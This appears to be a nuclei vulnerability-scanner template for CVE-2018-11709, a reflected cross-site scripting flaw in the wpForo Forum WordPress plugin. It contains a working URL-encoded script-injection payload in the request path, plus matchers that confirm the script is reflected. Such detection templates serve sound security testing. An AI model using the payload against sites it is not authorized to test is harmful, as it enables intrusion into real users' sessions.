nuclei-templates/cves/2018/CVE-2018-11709.yaml

36 lines
1.0 KiB
YAML

id: CVE-2018-11709
info:
name: wpForo Forum <= 1.4.11 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: wpforo_get_request_uri in wpf-includes/functions.php in the wpForo Forum plugin before 1.4.12 for WordPress allows Unauthenticated Reflected Cross-Site Scripting (XSS) via the URI.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11709
tags: cve,cve2018,wordpress,xss,wp-plugin
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2018-11709
cwe-id: CWE-79
requests:
- method: GET
path:
- '{{BaseURL}}/index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200